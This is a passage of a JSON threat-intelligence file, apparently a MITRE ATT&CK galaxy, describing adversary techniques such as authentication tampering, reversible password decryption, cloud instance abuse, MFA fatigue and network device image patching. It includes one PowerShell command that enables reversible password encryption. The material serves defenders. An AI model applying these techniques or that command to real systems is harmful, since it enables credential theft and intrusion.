"uses" + }, + { + "dest-uuid": "ec4f9786-c00c-430a-bc6d-0d0d22fdd393", + "type": "uses" + }, + { + "dest-uuid": "8e29c6c9-0c10-4bb0-827d-ff0ab8922726", + "type": "uses" + } + ], + "uuid": "852748c2-280b-41e8-ba87-d97ec9fade70", + "value": "Pluggable Authentication Modules" + }, + { + "description": "An adversary may abuse Active Directory authentication encryption properties to gain access to credentials on Windows systems. The AllowReversiblePasswordEncryption property specifies whether reversible password encryption for an account is enabled or disabled. By default this property is disabled (instead storing user credentials as the output of one-way hashing functions) and should not be enabled unless legacy or other software require it.[[store_pwd_rev_enc](https://app.tidalcyber.com/references/d3b9df24-b776-4658-9bb4-f43a2fe0094c)]\n\nIf the property is enabled and/or a user changes their password after it is enabled, an adversary may be able to obtain the plaintext of passwords created/changed after the property was enabled. To decrypt the passwords, an adversary needs four components:\n\n1. Encrypted password (G$RADIUSCHAP) from the Active Directory user-structure userParameters\n2. 16 byte randomly-generated value (G$RADIUSCHAPKEY) also from userParameters\n3. Global LSA secret (G$MSRADIUSCHAPKEY)\n4. Static key hardcoded in the Remote Access Subauthentication DLL (RASSFM.DLL)\n\nWith this information, an adversary may be able to reproduce the encryption key and subsequently decrypt the encrypted password value.[[how_pwd_rev_enc_1](https://app.tidalcyber.com/references/180246ca-94d8-4c78-894d-ae3b6fad3257)][[how_pwd_rev_enc_2](https://app.tidalcyber.com/references/cc08f190-5c17-441c-a6fa-99f8fdb8d1ae)]\n\nAn adversary may set this property at various scopes through Local Group Policy Editor, user properties, Fine-Grained Password Policy (FGPP), or via the ActiveDirectory [PowerShell](https://app.tidalcyber.com/technique/6ca7838a-e8ad-43e8-9da6-15b640d1cbde) module. For example, an adversary may implement and apply a FGPP to users or groups if the Domain Functional Level is set to \"Windows Server 2008\" or higher.[[dump_pwd_dcsync](https://app.tidalcyber.com/references/bd1d7e75-feee-47fd-abfb-7e3dfc648a72)] In PowerShell, an adversary may make associated changes to user settings using commands similar to Set-ADUser -AllowReversiblePasswordEncryption $true.", + "meta": { + "source": "MITRE", + "technique_attack_id": "T1556.005" + }, + "related": [ + { + "dest-uuid": "0c3132d5-c0df-4793-b5f2-1a95bd64ab53", + "type": "uses" + }, + { + "dest-uuid": "ec4f9786-c00c-430a-bc6d-0d0d22fdd393", + "type": "uses" + }, + { + "dest-uuid": "8e29c6c9-0c10-4bb0-827d-ff0ab8922726", + "type": "uses" + } + ], + "uuid": "9dc21246-3788-48d6-b6a1-f2a39ee38557", + "value": "Reversible Encryption" + }, + { + "description": "Adversaries may modify authentication mechanisms and processes to access user credentials or enable otherwise unwarranted access to accounts. The authentication process is handled by mechanisms, such as the Local Security Authentication Server (LSASS) process and the Security Accounts Manager (SAM) on Windows, pluggable authentication modules (PAM) on Unix-based systems, and authorization plugins on MacOS systems, responsible for gathering, storing, and validating credentials. By modifying an authentication process, an adversary may be able to authenticate to a service or system without using [Valid Accounts](https://app.tidalcyber.com/technique/a9b7eb2f-63e7-41bc-9d77-f7c4cede5406).\n\nAdversaries may maliciously modify a part of this process to either reveal credentials or bypass authentication mechanisms. Compromised credentials or access may be used to bypass access controls placed on various resources on systems within the network and may even be used for persistent access to remote systems and externally available services, such as VPNs, Outlook Web Access and remote desktop.", + "meta": { + "platforms": [ + "Azure AD", + "Google Workspace", + "IaaS", + "Linux", + "macOS", + "Network", + "Office 365", + "SaaS", + "Windows" + ], + "source": "MITRE", + "tags": [] + }, + "related": [ + { + "dest-uuid": "0c3132d5-c0df-4793-b5f2-1a95bd64ab53", + "type": "uses" + }, + { + "dest-uuid": "ec4f9786-c00c-430a-bc6d-0d0d22fdd393", + "type": "uses" + }, + { + "dest-uuid": "8e29c6c9-0c10-4bb0-827d-ff0ab8922726", + "type": "uses" + }, + { + "dest-uuid": "82d15799-9776-463e-9b87-a58d682cee55", + "type": "similar" + }, + { + "dest-uuid": "b0a1ef13-0c54-47e8-a220-7543ba41a327", + "type": "similar" + }, + { + "dest-uuid": "60498bb5-fcfb-4d85-bf3e-26c30c08fbda", + "type": "similar" + }, + { + "dest-uuid": "195aa08b-15fd-4019-b905-8f31bc5e2094", + "type": "similar" + }, + { + "dest-uuid": "f1329084-6e9c-5933-83cd-56c1bf8439e3", + "type": "similar" + }, + { + "dest-uuid": "cd65b0f4-a2a4-4291-aff2-1c65cf68cf6c", + "type": "similar" + }, + { + "dest-uuid": "852748c2-280b-41e8-ba87-d97ec9fade70", + "type": "similar" + }, + { + "dest-uuid": "9dc21246-3788-48d6-b6a1-f2a39ee38557", + "type": "similar" + } + ], + "uuid": "f516ecd7-a6a6-4018-8e58-c007be05bdce", + "value": "Modify Authentication Process" + }, + { + "description": "An adversary may create a new instance or virtual machine (VM) within the compute service of a cloud account to evade defenses. Creating a new instance may allow an adversary to bypass firewall rules and permissions that exist on instances currently residing within an account. An adversary may [Create Snapshot](https://app.tidalcyber.com/technique/bcaf63dc-660a-40d4-ba28-fc113b34bf51) of one or more volumes in an account, create a new instance, mount the snapshots, and then apply a less restrictive security policy to collect [Data from Local System](https://app.tidalcyber.com/technique/c0e4f97b-f651-493f-9636-6ac2f6fb46fb) or for [Remote Data Staging](https://app.tidalcyber.com/technique/cf76b79c-8226-4137-b3dd-8f516611b928).[[Mandiant M-Trends 2020](https://app.tidalcyber.com/references/83bc9b28-f8b3-4522-b9f1-f43bce3ae917)]\n\nCreating a new instance may also allow an adversary to carry out malicious activity within an environment without affecting the execution of current running instances.", + "meta": { + "source": "MITRE", + "technique_attack_id": "T1578.002" + }, + "related": [ + { + "dest-uuid": "8e29c6c9-0c10-4bb0-827d-ff0ab8922726", + "type": "uses" + } + ], + "uuid": "2ba8a662-6930-4cbe-9e3d-4cbe2109fd88", + "value": "Create Cloud Instance" + }, + { + "description": "An adversary may create a snapshot or data backup within a cloud account to evade defenses. A snapshot is a point-in-time copy of an existing cloud compute component such as a virtual machine (VM), virtual hard drive, or volume. An adversary may leverage permissions to create a snapshot in order to bypass restrictions that prevent access to existing compute service infrastructure, unlike in [Revert Cloud Instance](https://app.tidalcyber.com/technique/d1836637-e61d-42bb-9067-b325a201b7c7) where an adversary may revert to a snapshot to evade detection and remove evidence of their presence.\n\nAn adversary may [Create Cloud Instance](https://app.tidalcyber.com/technique/2ba8a662-6930-4cbe-9e3d-4cbe2109fd88), mount one or more created snapshots to that instance, and then apply a policy that allows the adversary access to the created instance, such as a firewall policy that allows them inbound and outbound SSH access.[[Mandiant M-Trends 2020](https://app.tidalcyber.com/references/83bc9b28-f8b3-4522-b9f1-f43bce3ae917)]", + "meta": { + "source": "MITRE", + "technique_attack_id": "T1578.001" + }, + "related": [ + { + "dest-uuid": "8e29c6c9-0c10-4bb0-827d-ff0ab8922726", + "type": "uses" + } + ], + "uuid": "bcaf63dc-660a-40d4-ba28-fc113b34bf51", + "value": "Create Snapshot" + }, + { + "description": "An adversary may delete a cloud instance after they have performed malicious activities in an attempt to evade detection and remove evidence of their presence. Deleting an instance or virtual machine can remove valuable forensic artifacts and other evidence of suspicious behavior if the instance is not recoverable.\n\nAn adversary may also [Create Cloud Instance](https://app.tidalcyber.com/technique/2ba8a662-6930-4cbe-9e3d-4cbe2109fd88) and later terminate the instance after achieving their objectives.[[Mandiant M-Trends 2020](https://app.tidalcyber.com/references/83bc9b28-f8b3-4522-b9f1-f43bce3ae917)]", + "meta": { + "source": "MITRE", + "technique_attack_id": "T1578.003" + }, + "related": [ + { + "dest-uuid": "8e29c6c9-0c10-4bb0-827d-ff0ab8922726", + "type": "uses" + } + ], + "uuid": "d7c90fc2-b7df-4e83-96af-9cf1c428ffa3", + "value": "Delete Cloud Instance" + }, + { + "description": "Adversaries may modify settings that directly affect the size, locations, and resources available to cloud compute infrastructure in order to evade defenses. These settings may include service quotas, subscription associations, tenant-wide policies, or other configurations that impact available compute. Such modifications may allow adversaries to abuse the victim’s compute resources to achieve their goals, potentially without affecting the execution of running instances and/or revealing their activities to the victim.\n\nFor example, cloud providers often limit customer usage of compute resources via quotas. Customers may request adjustments to these quotas to support increased computing needs, though these adjustments may require approval from the cloud provider. Adversaries who compromise a cloud environment may similarly request quota adjustments in order to support their activities, such as enabling additional [Resource Hijacking](https://app.tidalcyber.com/technique/d10c4a15-aeaa-4630-a7a3-3373c89a584f) without raising suspicion by using up a victim’s entire quota.[[Microsoft Cryptojacking 2023](https://app.tidalcyber.com/references/e2dbc963-b913-5a44-bb61-88a3f0d8d8a3)] Adversaries may also increase allowed resource usage by modifying any tenant-wide policies that limit the sizes of deployed virtual machines.[[Microsoft Azure Policy](https://app.tidalcyber.com/references/761d102e-768a-5536-a098-0b1819029d33)]\n\nAdversaries may also modify settings that affect where cloud resources can be deployed, such as enabling [Unused/Unsupported Cloud Regions](https://app.tidalcyber.com/technique/edf9f7d7-bc14-4e25-800d-f508acb580d4). In Azure environments, an adversary who has gained access to a Global Administrator account may create new subscriptions in which to deploy resources, or engage in subscription hijacking by transferring an existing pay-as-you-go subscription from a victim tenant to an adversary-controlled tenant.[[Microsoft Peach Sandstorm 2023](https://app.tidalcyber.com/references/84d026ed-b8f2-5bbb-865a-2d93aa4b2ef8)] This will allow the adversary to use the victim’s compute resources without generating logs on the victim tenant.[[Microsoft Azure Policy](https://app.tidalcyber.com/references/761d102e-768a-5536-a098-0b1819029d33)] [[Microsoft Subscription Hijacking 2022](https://app.tidalcyber.com/references/e5944e4c-76c6-55d1-97ec-8367b7f98c28)]", + "meta": { + "source": "MITRE", + "technique_attack_id": "T1578.005" + }, + "related": [ + { + "dest-uuid": "8e29c6c9-0c10-4bb0-827d-ff0ab8922726", + "type": "uses" + } + ], + "uuid": "04e8e75c-434e-51e0-9780-580a3823a8cb", + "value": "Modify Cloud Compute Configurations" + }, + { + "description": "An adversary may revert changes made to a cloud instance after they have performed malicious activities in attempt to evade detection and remove evidence of their presence. In highly virtualized environments, such as cloud-based infrastructure, this may be accomplished by restoring virtual machine (VM) or data storage snapshots through the cloud management dashboard or cloud APIs.\n\nAnother variation of this technique is to utilize temporary storage attached to the compute instance. Most cloud providers provide various types of storage including persistent, local, and/or ephemeral, with the ephemeral types often reset upon stop/restart of the VM.[[Tech Republic - Restore AWS Snapshots](https://app.tidalcyber.com/references/bfe848a3-c855-4bca-a6ea-44804d48c7eb)][[Google - Restore Cloud Snapshot](https://app.tidalcyber.com/references/ffa46676-518e-4fef-965d-e91efae95dfc)]", + "meta": { + "source": "MITRE", + "technique_attack_id": "T1578.004" + }, + "related": [ + { + "dest-uuid": "8e29c6c9-0c10-4bb0-827d-ff0ab8922726", + "type": "uses" + } + ], + "uuid": "d1836637-e61d-42bb-9067-b325a201b7c7", + "value": "Revert Cloud Instance" + }, + { + "description": "An adversary may attempt to modify a cloud account's compute service infrastructure to evade defenses. A modification to the compute service infrastructure can include the creation, deletion, or modification of one or more components such as compute instances, virtual machines, and snapshots.\n\nPermissions gained from the modification of infrastructure components may bypass restrictions that prevent access to existing infrastructure. Modifying infrastructure components may also allow an adversary to evade detection and remove evidence of their presence.[[Mandiant M-Trends 2020](https://app.tidalcyber.com/references/83bc9b28-f8b3-4522-b9f1-f43bce3ae917)]", + "meta": { + "platforms": [ + "IaaS" + ], + "source": "MITRE", + "tags": [] + }, + "related": [ + { + "dest-uuid": "8e29c6c9-0c10-4bb0-827d-ff0ab8922726", + "type": "uses" + }, + { + "dest-uuid": "2ba8a662-6930-4cbe-9e3d-4cbe2109fd88", + "type": "similar" + }, + { + "dest-uuid": "bcaf63dc-660a-40d4-ba28-fc113b34bf51", + "type": "similar" + }, + { + "dest-uuid": "d7c90fc2-b7df-4e83-96af-9cf1c428ffa3", + "type": "similar" + }, + { + "dest-uuid": "04e8e75c-434e-51e0-9780-580a3823a8cb", + "type": "similar" + }, + { + "dest-uuid": "d1836637-e61d-42bb-9067-b325a201b7c7", + "type": "similar" + } + ], + "uuid": "46c78b63-d079-441e-abdd-c16b39d4bab3", + "value": "Modify Cloud Compute Infrastructure" + }, + { + "description": "Adversaries may interact with the Windows Registry to hide configuration information within Registry keys, remove information as part of cleaning up, or as part of other techniques to aid in persistence and execution.\n\nAccess to specific areas of the Registry depends on account permissions, some requiring administrator-level access. The built-in Windows command-line utility [Reg](https://app.tidalcyber.com/software/d796615c-fa3d-4afd-817a-1a3db8c73532) may be used for local or remote Registry modification. [[Microsoft Reg](https://app.tidalcyber.com/references/1e1b21bd-18b3-4c77-8eb8-911b028ab603)] Other tools may also be used, such as a remote access tool, which may contain functionality to interact with the Registry through the Windows API.\n\nRegistry modifications may also include actions to hide keys, such as prepending key names with a null character, which will cause an error and/or be ignored when read via [Reg](https://app.tidalcyber.com/software/d796615c-fa3d-4afd-817a-1a3db8c73532) or other utilities using the Win32 API. [[Microsoft Reghide NOV 2006](https://app.tidalcyber.com/references/42503ec7-f5da-4116-a3b3-a1b18a66eed3)] Adversaries may abuse these pseudo-hidden keys to conceal payloads/commands used to maintain persistence. [[TrendMicro POWELIKS AUG 2014](https://app.tidalcyber.com/references/4a42df15-4d09-4f4f-8333-2b41356fdb80)] [[SpectorOps Hiding Reg Jul 2017](https://app.tidalcyber.com/references/877a5ae4-ec5f-4f53-b69d-ba74ff9e1619)]\n\nThe Registry of a remote system may be modified to aid in execution of files as part of lateral movement. It requires the remote Registry service to be running on the target system. [[Microsoft Remote](https://app.tidalcyber.com/references/331d59e3-ce7f-483c-b77d-001c8a9ae1df)] Often [Valid Accounts](https://app.tidalcyber.com/technique/a9b7eb2f-63e7-41bc-9d77-f7c4cede5406) are required, along with access to the remote system's [SMB/Windows Admin Shares](https://app.tidalcyber.com/technique/bc2f2c6c-ffe7-4e78-bbac-369f6781bbdd) for RPC communication.", + "meta": { + "platforms": [ + "Windows" + ], + "source": "MITRE", + "tags": [] + }, + "related": [ + { + "dest-uuid": "8e29c6c9-0c10-4bb0-827d-ff0ab8922726", + "type": "uses" + } + ], + "uuid": "0dfeab84-3c42-4b56-9021-70fe5be4092b", + "value": "Modify Registry" + }, + { + "description": "Adversaries may install an older version of the operating system of a network device to weaken security. Older operating system versions on network devices often have weaker encryption ciphers and, in general, fewer/less updated defensive features. [[Cisco Synful Knock Evolution](https://app.tidalcyber.com/references/29301297-8343-4f75-8096-7fe229812f75)]\n\nOn embedded devices, downgrading the version typically only requires replacing the operating system file in storage. With most embedded devices, this can be achieved by downloading a copy of the desired version of the operating system file and reconfiguring the device to boot from that file on next system restart. The adversary could then restart the device to implement the change immediately or they could wait until the next time the system restarts.\n\nDowngrading the system image to an older versions may allow an adversary to evade defenses by enabling behaviors such as [Weaken Encryption](https://app.tidalcyber.com/technique/8cf19b3d-c9fa-4d71-a6ab-dc0e236e57d4). Downgrading of a system image can be done on its own, or it can be used in conjunction with [Patch System Image](https://app.tidalcyber.com/technique/630a17c1-0176-4764-8f5c-a83f4f3e980f). ", + "meta": { + "source": "MITRE", + "technique_attack_id": "T1601.002" + }, + "related": [ + { + "dest-uuid": "8e29c6c9-0c10-4bb0-827d-ff0ab8922726", + "type": "uses" + } + ], + "uuid": "49e3504a-e031-45a0-b816-1d3741a78c7f", + "value": "Downgrade System Image" + }, + { + "description": "Adversaries may modify the operating system of a network device to introduce new capabilities or weaken existing defenses.[[Killing the myth of Cisco IOS rootkits](https://app.tidalcyber.com/references/538070d6-fbdb-4cc9-8ddf-c331e4375cfb)] [[Killing IOS diversity myth](https://app.tidalcyber.com/references/19d7ccc6-76ed-4b12-af50-f810fbc22037)] [[Cisco IOS Shellcode](https://app.tidalcyber.com/references/55a45f9b-7be4-4f1b-8b19-a0addf9da8d8)] [[Cisco IOS Forensics Developments](https://app.tidalcyber.com/references/95fdf251-f40d-4f7a-bb12-8762e9c961b9)] [[Juniper Netscreen of the Dead](https://app.tidalcyber.com/references/3b87bd85-c6dd-4bd9-9427-33b5bd84db4a)] Some network devices are built with a monolithic architecture, where the entire operating system and most of the functionality of the device is contained within a single file. Adversaries may change this file in storage, to be loaded in a future boot, or in memory during runtime.\n\nTo change the operating system in storage, the adversary will typically use the standard procedures available to device operators. This may involve downloading a new file via typical protocols used on network devices, such as TFTP, FTP, SCP, or a console connection. The original file may be overwritten, or a new file may be written alongside of it and the device reconfigured to boot to the compromised image.\n\nTo change the operating system in memory, the adversary typically can use one of two methods. In the first, the adversary would make use of native debug commands in the original, unaltered running operating system that allow them to directly modify the relevant memory addresses containing the running operating system. This method typically requires administrative level access to the device.\n\nIn the second method for changing the operating system in memory, the adversary would make use of the boot loader. The boot loader is the first piece of software that loads when the device starts that, in turn, will launch the operating system. Adversaries may use malicious code previously implanted in the boot loader, such as through the [ROMMONkit](https://app.tidalcyber.com/technique/b9d60848-388e-444c-9f22-2267ea61b5e9) method, to directly manipulate running operating system code in memory. This malicious code in the bootloader provides the capability of direct memory manipulation to the adversary, allowing them to patch the live operating system during runtime.\n\nBy modifying the instructions stored in the system image file, adversaries may either weaken existing defenses or provision new capabilities that the device did not have before. Examples of existing defenses that can be impeded include encryption, via [Weaken Encryption](https://app.tidalcyber.com/technique/8cf19b3d-c9fa-4d71-a6ab-dc0e236e57d4), authentication, via [Network Device Authentication](https://app.tidalcyber.com/technique/195aa08b-15fd-4019-b905-8f31bc5e2094), and perimeter defenses, via [Network Boundary Bridging](https://app.tidalcyber.com/technique/091282d8-ef05-487f-93aa-445efaeed71b). Adding new capabilities for the adversary’s purpose include [Keylogging](https://app.tidalcyber.com/technique/7f1798b5-b159-441b-a5ef-3b5c706e1699), [Multi-hop Proxy](https://app.tidalcyber.com/technique/fa05c148-56a0-43ae-b8e4-2d4e91641400), and [Port Knocking](https://app.tidalcyber.com/technique/34a112db-c61d-4ea2-872f-de3fc1af87a3).\n\nAdversaries may also compromise existing commands in the operating system to produce false output to mislead defenders. When this method is used in conjunction with [Downgrade System Image](https://app.tidalcyber.com/technique/49e3504a-e031-45a0-b816-1d3741a78c7f), one example of a compromised system command may include changing the output of the command that shows the version of the currently running operating system. By patching the operating system, the adversary can change this command to instead display the original, higher revision number that they replaced through the system downgrade. \n\nWhen the operating system is patched in storage, this can be achieved in either the resident storage (typically a form of flash memory, which is non-volatile) or via [TFTP Boot](https://app.tidalcyber.com/technique/6f2186f3-c798-46e8-a26f-ae033822837b). \n\nWhen the technique is performed on the running operating system in memory and not on the stored copy, this technique will not survive across reboots. However, live memory modification of the operating system can be combined with [ROMMONkit](https://app.tidalcyber.com/technique/b9d60848-388e-444c-9f22-2267ea61b5e9) to achieve persistence. ", + "meta": { + "source": "MITRE", + "technique_attack_id": "T1601.001" + }, + "related": [ + { + "dest-uuid": "8e29c6c9-0c10-4bb0-827d-ff0ab8922726", + "type": "uses" + } + ], + "uuid": "630a17c1-0176-4764-8f5c-a83f4f3e980f", + "value": "Patch System Image" + }, + { + "description": "Adversaries may make changes to the operating system of embedded network devices to weaken defenses and provide new capabilities for themselves. On such devices, the operating systems are typically monolithic and most of the device functionality and capabilities are contained within a single file.\n\nTo change the operating system, the adversary typically only needs to affect this one file, replacing or modifying it. This can either be done live in memory during system runtime for immediate effect, or in storage to implement the change on the next boot of the network device.", + "meta": { + "platforms": [ + "Network" + ], + "source": "MITRE", + "tags": [] + }, + "related": [ + { + "dest-uuid": "8e29c6c9-0c10-4bb0-827d-ff0ab8922726", + "type": "uses" + }, + { + "dest-uuid": "49e3504a-e031-45a0-b816-1d3741a78c7f", + "type": "similar" + }, + { + "dest-uuid": "630a17c1-0176-4764-8f5c-a83f4f3e980f", + "type": "similar" + } + ], + "uuid": "f435a5ff-78d2-44de-b464-2b5528f94adc", + "value": "Modify System Image" + }, + { + "description": "Adversaries may target multi-factor authentication (MFA) mechanisms, (i.e., smart cards, token generators, etc.) to gain access to credentials that can be used to access systems, services, and network resources. Use of MFA is recommended and provides a higher level of security than usernames and passwords alone, but organizations should be aware of techniques that could be used to intercept and bypass these security mechanisms. \n\nIf a smart card is used for multi-factor authentication, then a keylogger will need to be used to obtain the password associated with a smart card during normal use. With both an inserted card and access to the smart card password, an adversary can connect to a network resource using the infected system to proxy the authentication with the inserted hardware token. [[Mandiant M Trends 2011](https://app.tidalcyber.com/references/563be052-29ac-4625-927d-84e475ef848e)]\n\nAdversaries may also employ a keylogger to similarly target other hardware tokens, such as RSA SecurID. Capturing token input (including a user's personal identification code) may provide temporary access (i.e. replay the one-time passcode until the next value rollover) as well as possibly enabling adversaries to reliably predict future authentication values (given access to both the algorithm and any seed values used to generate appended temporary codes). [[GCN RSA June 2011](https://app.tidalcyber.com/references/40564d23-b9ae-4bb3-8dd1-d6b01163a32d)]\n\nOther methods of MFA may be intercepted and used by an adversary to authenticate. It is common for one-time codes to be sent via out-of-band communications (email, SMS). If the device and/or service is not secured, then it may be vulnerable to interception. Service providers can also be targeted: for example, an adversary may compromise an SMS messaging service in order to steal MFA codes sent to users’ phones.[[Okta Scatter Swine 2022](https://app.tidalcyber.com/references/66d1b6e2-c069-5832-b549-fc5f0edeed40)]", + "meta": { + "platforms": [ + "Linux", + "macOS", + "Windows" + ], + "source": "MITRE", + "tags": [] + }, + "related": [ + { + "dest-uuid": "0c3132d5-c0df-4793-b5f2-1a95bd64ab53", + "type": "uses" + } + ], + "uuid": "600d45ec-cb9c-47b8-ae94-326471ebb007", + "value": "Multi-Factor Authentication Interception" + }, + { + "description": "Adversaries may attempt to bypass multi-factor authentication (MFA) mechanisms and gain access to accounts by generating MFA requests sent to users.\n\nAdversaries in possession of credentials to [Valid Accounts](https://app.tidalcyber.com/technique/a9b7eb2f-63e7-41bc-9d77-f7c4cede5406) may be unable to complete the login process if they lack access to the 2FA or MFA mechanisms required as an additional credential and security control. To circumvent this, adversaries may abuse the automatic generation of push notifications to MFA services such as Duo Push, Microsoft Authenticator, Okta, or similar services to have the user grant access to their account.\n\nIn some cases, adversaries may continuously repeat login attempts in order to bombard users with MFA push notifications, SMS messages, and phone calls, potentially resulting in the user finally accepting the authentication request in response to “MFA fatigue.”[[Russian 2FA Push Annoyance - Cimpanu](https://app.tidalcyber.com/references/ad2b0648-b657-4daa-9510-82375a252fc4)][[MFA Fatigue Attacks - PortSwigger](https://app.tidalcyber.com/references/1b7b0f00-71ba-4762-ae81-bce24591cff4)][[Suspected Russian Activity Targeting Government and Business Entities Around the Globe](https://app.tidalcyber.com/references/f45a0551-8d49-4d40-989f-659416dc25ec)]", + "meta": { + "platforms": [ + "Azure AD", + "Google Workspace", + "IaaS", + "Linux", + "macOS", + "Office 365", + "SaaS", + "Windows" + ], + "source": "MITRE", + "tags": [] + }, + "related": [ + { + "dest-uuid": "0c3132d5-c0df-4793-b5f2-1a95bd64ab53", + "type": "uses" + } + ], + "uuid": "c0f2efd4-bfc8-43da-9859-14446fb8f289", + "value": "Multi-Factor Authentication Request Generation" + }, + { + "description": "Adversaries may create multiple stages for command and control that are employed under different conditions or for certain functions. Use of multiple stages may obfuscate the command and control channel to make detection more difficult.\n\nRemote access tools will call back to the first-stage command and control server for instructions. The first stage may have automated capabilities to collect basic host information, update tools, and upload additional files. A second remote access tool (RAT) could be uploaded at that point to redirect the host to the second-stage command and control server. The second stage will likely be more fully featured and allow the adversary to interact with the system through a reverse shell and additional RAT features.\n\nThe different stages will likely be hosted separately with no overlapping infrastructure. The loader may also have backup first-stage callbacks or [Fallback Channels](https://app.tidalcyber.com/technique/be8786b3-cd3d-47ef-a9e7-cd3ab3c901a1) in case the original first-stage communication path is discovered and blocked.", + "meta": { + "platforms": [ + "Linux", + "macOS", + "Windows" + ], + "source": "MITRE", + "tags": [] + }, + "related": [ + { + "dest-uuid": "94ffe549-1c29-438d-9c7f-e27f7acee0bb", + "type": "uses" + } + ], + "uuid": "e54bdb49-6039-4048-9be6-657a7ff3e071", + "value": "Multi-Stage Channels" + }, + { + "description": "Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.[[NT API Windows](https://app.tidalcyber.com/references/306f7da7-caa2-40bf-a3db-e579c541eeb4)][[Linux Kernel API](https://app.tidalcyber.com/references/0a30d54e-187a-43e0-9725-3c80aa1c7619)] These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.\n\nAdversaries may abuse these OS API functions as a means of executing behaviors. Similar to [Command and Scripting Interpreter](https://app.tidalcyber.com/technique/a2184d53-63b1-4c40-81ed-da799080c36c), the native API and its hierarchy of interfaces provide mechanisms to interact with and utilize various components of a victimized system.\n\nNative API functions (such as NtCreateProcess) may be directed invoked via system calls / syscalls, but these features are also often exposed to user-mode applications via interfaces and libraries.[[OutFlank System Calls](https://app.tidalcyber.com/references/c4c3370a-2d6b-4ebd-961e-58d584066377)][[CyberBit System Calls](https://app.tidalcyber.com/references/c13cf528-2a7d-4a32-aee2-db5db2f30298)][[MDSec System Calls](https://app.tidalcyber.com/references/b461e226-1317-4ce4-a195-ba4c4957db99)] For example, functions such as the Windows API CreateProcess() or GNU fork() will allow programs and scripts to start other processes.[[Microsoft CreateProcess](https://app.tidalcyber.com/references/aa336e3a-464d-48ce-bebb-760b73764610)][[GNU Fork](https://app.tidalcyber.com/references/c46331cb-328a-46e3-89c4-e43fa345d6e8)] This may allow API callers to execute a binary, run a CLI command, load modules, etc. as thousands of similar API functions exist for various system operations.[[Microsoft Win32](https://app.tidalcyber.com/references/585b9975-3cfb-4485-a9eb-5eea337ebd3c)][[LIBC](https://app.tidalcyber.com/references/a3fe6ea5-c443-473a-bb13-b4fd8f4923fd)][[GLIBC](https://app.tidalcyber.com/references/75a6a1bf-a5a7-419d-b290-6662aeddb7eb)]\n\nHigher level software frameworks, such as Microsoft .NET and macOS Cocoa, are also available to interact with native APIs. These frameworks typically provide language wrappers/abstractions to API functionalities and are designed for ease-of-use/portability of code.[[Microsoft NET](https://app.tidalcyber.com/references/b4727044-51bb-43b3-afdb-515bb4bb0f7e)][[Apple Core Services](https://app.tidalcyber.com/references/0ef05e47-1305-4715-a677-67f1b55b24a3)][[MACOS Cocoa](https://app.tidalcyber.com/references/6ada4c6a-23dc-4469-a3a1-1d3b4935db97)][[macOS Foundation](https://app.tidalcyber.com/references/ea194268-0a8f-4494-be09-ef5f679f68fe)]\n\nAdversaries may use assembly to directly or in-directly invoke syscalls in an attempt to subvert defensive sensors and detection signatures such as user mode API-hooks.[[Redops Syscalls](https://app.tidalcyber.com/references/dd8c2edd-b5ba-5a41-b65d-c3a2951d07b8)] Adversaries may also attempt to tamper with sensors and defensive tools associated with API monitoring, such as unhooking monitored functions via [Disable or Modify Tools](https://app.tidalcyber.com/technique/9f290216-b2ab-47b5-b9ae-a94ae6d357c6).", + "meta": { + "platforms": [ + "Linux", + "macOS", + "Windows" + ], + "source": "MITRE", + "tags": [] + }, + "related": [ + { + "dest-uuid": "dad2337d-6d35-410a-acc5-da36ff83ee44", + "type": "uses" + } + ], + "uuid": "1120f5ec-ef1b-4596-8d8b-a3979a766560", + "value": "Native API" + }, + { + "description": "Adversaries may bridge network boundaries by modifying a network device’s Network Address Translation (NAT) configuration. Malicious modifications to NAT may enable an adversary to bypass restrictions on traffic routing that otherwise separate trusted and untrusted networks.\n\nNetwork devices such as routers and firewalls that connect multiple networks together may implement NAT during the process of passing packets between networks. When performing NAT, the network device will rewrite the source and/or destination addresses of the IP address header. Some network designs require NAT for the packets to cross the border device. A typical example of this is environments where internal networks make use of non-Internet routable addresses.[[RFC1918](https://app.tidalcyber.com/references/f2cdf62e-cb9b-4a48-99a2-d46e7d9e7a9e)]\n\nWhen an adversary gains control of a network boundary device, they can either leverage existing NAT configurations to send traffic between two separated networks, or they can implement NAT configurations of their own design. In the case of network designs that require NAT to function, this enables the adversary to overcome inherent routing limitations that would normally prevent them from accessing protected systems behind the border device. In the case of network designs that do not require NAT, address translation can be used by adversaries to obscure their activities, as changing the addresses of packets that traverse a network boundary device can make monitoring data transmissions more challenging for defenders. \n\nAdversaries may use [Patch System Image](https://app.tidalcyber.com/technique/630a17c1-0176-4764-8f5c-a83f4f3e980f) to change the operating system of a network device, implementing their own custom NAT mechanisms to further obscure their activities", + "meta": { + "source": "MITRE", + "technique_attack_id": "T1599.001" + }, + "related": [ + { + "dest-uuid": "8e29c6c9-0c10-4bb0-827d-ff0ab8922726", + "type": "uses" + } + ], + "uuid": "06f738c0-fbab-4d14-83ad-56240c8f35ac", + "value": "Network Address Translation Traversal" + }, + { + "description": "Adversaries may bridge network boundaries by compromising perimeter network devices or internal devices responsible for network segmentation. Breaching these devices may enable an adversary to bypass restrictions on traffic routing that otherwise separate trusted and untrusted networks.\n\nDevices such as routers and firewalls can be used to create boundaries between trusted and untrusted networks. They achieve this by restricting traffic types to enforce organizational policy in an attempt to reduce the risk inherent in such connections. Restriction of traffic can be achieved by prohibiting IP addresses, layer 4 protocol ports, or through deep packet inspection to identify applications. To participate with the rest of the network, these devices can be directly addressable or transparent, but their mode of operation has no bearing on how the adversary can bypass them when compromised.\n\nWhen an adversary takes control of such a boundary device, they can bypass its policy enforcement to pass normally prohibited traffic across the trust boundary between the two separated networks without hinderance. By achieving sufficient rights on the device, an adversary can reconfigure the device to allow the traffic they want, allowing them to then further achieve goals such as command and control via [Multi-hop Proxy](https://app.tidalcyber.com/technique/fa05c148-56a0-43ae-b8e4-2d4e91641400) or exfiltration of data via [Traffic Duplication](https://app.tidalcyber.com/technique/c2fc2776-e674-46ff-8b8d-ecc90b8b1c26). Adversaries may also target internal devices responsible for network segmentation and abuse these in conjunction with [Internal Proxy](https://app.tidalcyber.com/technique/8b744bfc-6bfb-45c5-8bb8-5b736ce7e634) to achieve the same goals.[[Kaspersky ThreatNeedle Feb 2021](https://app.tidalcyber.com/references/ba6a5fcc-9391-42c0-8b90-57b729525f41)] In the cases where a border device separates two separate organizations, the adversary can also facilitate lateral movement into new victim environments.", + "meta": { + 